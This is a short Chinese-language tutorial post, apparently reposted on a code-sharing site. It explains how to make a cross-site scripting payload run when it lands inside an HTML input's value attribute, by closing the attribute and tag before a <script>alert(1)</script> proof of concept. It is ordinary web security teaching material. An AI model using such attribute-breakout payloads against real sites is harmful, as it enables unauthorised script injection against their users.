xss漏洞 當發現js代碼插入到了html中,但無法執行的情況


如下發現js代碼插入到HTML中,但是無法執行,因為xss代碼出現在value中,被當作值來處理。

<input type="text" name="content" value="<script>alert(1)</script>" />

可以用如下方法讓HTML閉合

插入xss代碼為:"  "/><script>alert(1)</script> "

<input type="text" name="content" value=" "/><script>alert(1)</script>" />


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM